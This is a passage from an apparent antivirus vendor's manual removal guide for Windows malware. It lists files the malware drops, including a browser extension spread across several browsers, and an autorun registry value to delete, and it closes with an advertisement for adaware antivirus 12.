    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\DirectUI\is-TO7V8.tmp (594 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-AGEEL.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-A35DN.tmp (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-4SP61.tmp\src2011.tmp (1423 bytes)
    C:\Windows\onest.txt (1 bytes)
    C:\Windows\Report.log (7 bytes)
    C:\Windows\Media\McIe.wav (17 bytes)
    C:\Windows\Media\Mcfg.wav (1 bytes)
    C:\Windows\tAzJsX\27e.exe (108 bytes)
    C:\Windows\tAzJsX\bFuAq.exe (218 bytes)
    C:\Windows\tAzJsX\Dqc.exe (108 bytes)
    C:\Windows\tAzJsX\G57.exe (108 bytes)
    C:\Windows\tAzJsX\BPp.exe (108 bytes)
    C:\Windows\tAzJsX\PTR.exe (108 bytes)
    C:\Windows\Media\hd.wav (1 bytes)
    C:\Windows\mcconfig.dat (2 bytes)
    C:\Windows\pcq.exe (108 bytes)
    C:\Windows\tAzJsX\LiveUDHelper.dll (1 bytes)
    C:\Windows\tAzJsX\drH.exe (108 bytes)
    C:\Windows\tAzJsX\MIJ.exe (108 bytes)
    C:\Windows\tem.vbs (169 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games\Steam Dark Messiah Might and Magic Single Playerâ„¢.lnk (280 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B912B2C6928A18B8CD7D50CF08BEA95B_481E03432F6D1AE9D28AB3294512C01D (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\GameExplorer\{98A0A23D-0A5F-4D35-9D4A-DAF2B7F0CF43}\PlayTasks\0\Play.lnk (756 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab6344.tmp (51 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1DAF2884EC4DFA96BA4A58D4DBC9C406 (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar6345.tmp (2712 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B912B2C6928A18B8CD7D50CF08BEA95B_481E03432F6D1AE9D28AB3294512C01D (1848 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1DAF2884EC4DFA96BA4A58D4DBC9C406 (804 bytes)
    C:\Windows\WindowsUpdate\otqvyruekg.exe (47523 bytes)
    %Program Files%\HC188.exe (1522 bytes)
    C:\Windows\st.dat (75 bytes)
    C:\Windows\Media\[i1HKe].mp3 (1 bytes)
    C:\Windows\star.dat (44 bytes)
    C:\Windows\webpid.txt (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\res\icon.gif (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\res\crx.png (196 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\background.js (772 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
    %Program Files%\Google\Chrome\Application\54.0.2840.59\resources.pak (597622 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\_metadata\verified_contents.json (580 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\cupdate.dat (157 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (8273 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\_metadata\computed_hashes.json (1060 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\popup.html (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\_locales\en\messages.json (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\background.html (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\_metadata\verified_contents.json (580 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\background.js (772 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\_locales\en\messages.json (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\background.html (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\background.js (772 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (88 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\popup.html (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\_locales\zh_CN\messages.json (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\res\icon.gif (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\jyrl\config\rili.ini (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\popup.html (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\_metadata\verified_contents.json (580 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\_locales\zh_CN\messages.json (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\_locales\zh_CN\messages.json (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\res\crx.png (196 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\background.html (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\_locales\en\messages.json (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fe2c\jyrili.exe (3073 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\_metadata\computed_hashes.json (1060 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\res\icon.gif (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\7zxr.dll (18123 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\res\crx.png (88 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\_metadata\computed_hashes.json (1060 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\_locales\zh_CN\messages.json (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\_locales\en\messages.json (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\_locales\en\messages.json (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\res\icon.gif (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\_metadata\verified_contents.json (580 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\background.html (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\_metadata\computed_hashes.json (1060 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\cupdate.dat (157 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\_metadata\verified_contents.json (580 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\background.js (772 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\_locales\zh_CN\messages.json (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\background.js (772 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\res\icon.gif (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\res\icon.gif (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\popup.html (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\_metadata\verified_contents.json (580 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\7zxr.dll (18123 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\background.js (772 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\popup.html (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\res\crx.png (88 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\res\crx.png (196 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\res\crx.png (196 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\_locales\en\messages.json (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\_metadata\computed_hashes.json (1060 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\_locales\zh_CN\messages.json (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\popup.html (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\_metadata\computed_hashes.json (1060 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\background.html (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\background.html (230 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "otqvyruekg.exe" = "C:\Windows\WindowsUpdate\otqvyruekg.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet

x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now